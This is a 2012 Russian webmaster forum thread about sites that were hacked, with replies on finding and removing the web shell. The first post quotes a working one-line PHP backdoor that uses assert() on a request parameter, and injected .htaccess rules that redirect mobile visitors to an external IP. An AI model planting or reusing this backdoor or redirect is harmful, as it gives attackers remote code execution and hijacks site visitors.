X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

Открыть тему
Тема закрыта
> Вопрос ХАК гуру, Взломали сайт
webscs
webscs
Topic Starter сообщение 8.5.2012, 22:29; Ответить: webscs
Сообщение #1


Добрый день форумчане, на некоторых моих сайтах, независимо от движка появилась такая бяка.

  1. Появился php файл phpinfo c Кодом - <?
    define('PHPSESSID',@assert($_REQUEST['PHPSESSID']))
    or phpinfo();
    ?>
  2. в файл .htaccess появились строки

    ###AB.PROTECTION###
    RewriteEngine on
    RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} "acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-" [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} "dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-" [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} "maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv" [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} "palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany" [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} "sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo" [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} "teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi" [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} "wapp|wapr|webc|winw|winw|xda|xda-" [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} "up.browser|up.link|windowssce|iemobile|mini|mmp" [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} "symbian|midp|wap|blackberry|j2me|smartphone|series|phone|pocket|mobile|pda|
    psp|PPC|Android" [NC]
    RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
    RewriteCond %{HTTP_USER_AGENT} !america [NC]
    RewriteCond %{HTTP_USER_AGENT} !avant [NC]
    RewriteCond %{HTTP_USER_AGENT} !download [NC]
    RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
    RewriteRule ^(.*)$ httр://91[точка]224[точка]161[точка]175/go/1/[L,R=302]

    Если зайти с мобильных устройств, идет редирект на "httр://91[точка]224[точка]161[точка]175/go/1/"

    также в некоторых файлах строки вида

    ###BB.PROTECTION###
    RewriteEngine on
    RewriteBase /
    RewriteCond %{QUERY_STRING} ^(%2d|-)
    RewriteRule ^(.*)$ - [F]


Причем в логах с сайтов на wordpress инфы по error по нулям, на самописном

PHP Warning: include(inc/_conf_igur_ator.php) [<a href='function.include'>function.include</a>]: failed to open stream: No such file or directory in...... on line 2
PHP Warning: include() [<a href='function.include'>function.include</a>]: Failed opening 'inc/_conf_igur_ator.php' for inclusion (include_path='.:/usr/local/php5/share/pear') in .... on line 2

может кто поможет, советом...

P.S. я в шоке как можно было разузнать имя фала конфига - _conf_igur_ator.php, подбором такое ведь не угадать

Сообщение отредактировал webscs - 8.5.2012, 22:31
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Informator
Informator
сообщение 8.5.2012, 23:34; Ответить: Informator
Сообщение #2


(webscs @ 8.5.2012, 23:29) *
Добрый день форумчане, на некоторых моих сайтах, независимо от движка появилась такая бяка.


Причем в логах с сайтов на wordpress инфы по error по нулям, на самописном

PHP Warning: include(inc/_conf_igur_ator.php) [<a href='function.include'>function.include</a>]: failed to open stream: No such file or directory in...... on line 2
PHP Warning: include() [<a href='function.include'>function.include</a>]: Failed opening 'inc/_conf_igur_ator.php' for inclusion (include_path='.:/usr/local/php5/share/pear') in .... on line 2

может кто поможет, советом...

P.S. я в шоке как можно было разузнать имя фала конфига - _conf_igur_ator.php, подбором такое ведь не угадать


Здравствуйте.
Файл конфига узнать не проблема, если на сайте залит шелл, а он залит, раз имеет полные права управлением апача. Ищите шелл, он где – есть однозначно. Проверяйте папки, которые имеют права на запись, такие как cache, uploads, templates.

Если можно несколько вопросов: Сайты, которые имеют такие коды, находятся на одном IP адресе?
Какие права доступа были прописаны на файл .htaccess раньше?
И еще можно ссылку на любой из сайтов, где таврится такая беда?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
House
House
сообщение 8.5.2012, 23:41; Ответить: House
Сообщение #3


А в чем собственно, проблема?
Удалите ненужный хлам из файлов. Проблема возможна в одной из cms.

Проверьте с какими правами был залит файл phpinfo.php.

(Informator @ 8.5.2012, 23:34) *
раз имеет полные права управлением апача.

Есть сотни способов обойти логирование апача без прав root.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Informator
Informator
сообщение 9.5.2012, 0:16; Ответить: Informator
Сообщение #4


(House @ 9.5.2012, 0:41) *
А в чем собственно, проблема?
Удалите ненужный хлам из файлов. Проблема возможна в одной из cms.

Проверьте с какими правами был залит файл phpinfo.php.


Есть сотни способов обойти логирование апача без прав root.


Я с вами полностью согласен. Дыр много, особенно в новом Апаче.

Просто если у него сайты весят на одном айпи, код будет снова появляться. Ему нужно будет чистить все сайты на этом айпи, а потом просто латать дыры.

Злили скорей всего через Wordpress, безопасность у этих CMS не очень.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
House
House
сообщение 9.5.2012, 0:59; Ответить: House
Сообщение #5


(Informator @ 9.5.2012, 0:16) *
Злили скорей всего через Wordpress, безопасность у этих CMS не очень.

У дополнений и т.п. В движках нет уязвимостей, а если и есть, то они быстро латаются.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Electric
Electric
сообщение 9.5.2012, 2:33; Ответить: Electric
Сообщение #6


Ищите шеллы в темах. Если на аккаунте есть еще сайты - ищите в них.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
BADbIk
BADbIk
сообщение 10.5.2012, 15:45; Ответить: BADbIk
Сообщение #7


Хостинг случайно не от РБК(hc.ru)? Обнаружил подобные изменения на одном из своих сайтов, судя по дате изменения были произведены вечером 7ого мая. В корне был создан файл phpinfo.php с приведенным выше содержимым, а .htaccess был заменен(!!!) на

(webscs @ 8.5.2012, 22:29) *
    ###BB.PROTECTION###
    RewriteEngine on
    RewriteBase /
    RewriteCond %{QUERY_STRING} ^(%2d|-)
    RewriteRule ^(.*)$ - [F]


Из-за замены хтакксесса перестало работать половину страниц сайта - так собственно я и заметил неладное. Отписал в службу поддержки - там ответили шаблоном, что типа ваш сайт был взломан, проверьте ваш компьютер антивирусом и тд..

Мне кажется, изменения были внесены самим персоналом хостинг-центра, так как эти изменения появились сразу же после публикации статьи про уязвимость на хабре http://habrahabr.ru/post/143331/ - в комментах писалось, что рбк уязвим на каких-то тарифах. Видимо они хотели быстро все исправить, но накосячили и ссылаются теперь на взломы.

Вариант со взломом у меня отпал, т.к. сайт почти статичный, за исключением пары скриптов с несколькими if - так что взламывать там нечего, если только не был взломан сам сервер. Логи тоже пустые. Хостинг покупался в 2008 году, так что скорее всего это был именно тот самый уязвимый тариф.

Замечание модератора:
Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней.
Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой
или обратитесь к любому из модераторов.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Вопрос - платное размещение баннеров на сайте
10 WGN 3126 14.12.2020, 14:20
автор: Peterson
Открытая тема (нет новых ответов) Вопрос по рекламе в "инстаграме"
Только активные аккаунты могут создавать или редактировать рекламу
8 Zubkov 16021 17.1.2020, 17:49
автор: Forumacc
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыВопрос-ответ о работе форума
307 dos1k 43057 9.11.2019, 17:59
автор: heks
Открытая тема (нет новых ответов) Жена логопед, собрался ей приводить клиентов. Встал вопрос, куда приводить.
В теме перечисление доступного мне продвижения, но с чего начать?
9 memeplex 3693 16.2.2019, 15:45
автор: zyzy
Открытая тема (нет новых ответов) SEO-Гуру 2018 - новое руководство от Dr.Max
Все секреты мобильного, регионального продвижения
0 AnnaYa 3864 26.4.2018, 17:09
автор: AnnaYa


 



RSS Текстовая версия Сейчас: 29.3.2024, 15:41
Дизайн